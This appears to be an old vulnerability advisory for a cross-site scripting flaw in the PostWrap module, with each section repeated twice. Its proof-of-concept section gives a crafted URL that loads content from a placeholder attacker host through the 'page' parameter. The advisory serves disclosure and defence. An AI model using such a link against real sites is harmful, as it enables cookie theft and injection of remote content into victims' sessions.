PostWrap Module Cross-Site Scripting Vulnerability
BID:12505
Info
PostWrap Module Cross-Site Scripting Vulnerability
| Bugtraq ID: | 12505 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 09 2005 12:00AM |
| Updated: | Feb 09 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Albania Security Clan. |
| Vulnerable: |
PostWrap PostWrap 2.5 PostWrap PostWrap 2.1 |
| Not Vulnerable: | |
Discussion
PostWrap Module Cross-Site Scripting Vulnerability
PostWrap is reportedly affected by a cross-site scripting vulnerability. This issue is due to the application failing to properly sanitize user-supplied input.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
PostWrap is reportedly affected by a cross-site scripting vulnerability. This issue is due to the application failing to properly sanitize user-supplied input.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
PostWrap Module Cross-Site Scripting Vulnerability
No exploit is required.
The following proof of concept is available:
http://www.example.com/index.php?module=PostWrap&page=http://[attacker]/HACK/asc/ascmd.txt
No exploit is required.
The following proof of concept is available:
http://www.example.com/index.php?module=PostWrap&page=http://[attacker]/HACK/asc/ascmd.txt
Solution / Fix
PostWrap Module Cross-Site Scripting Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.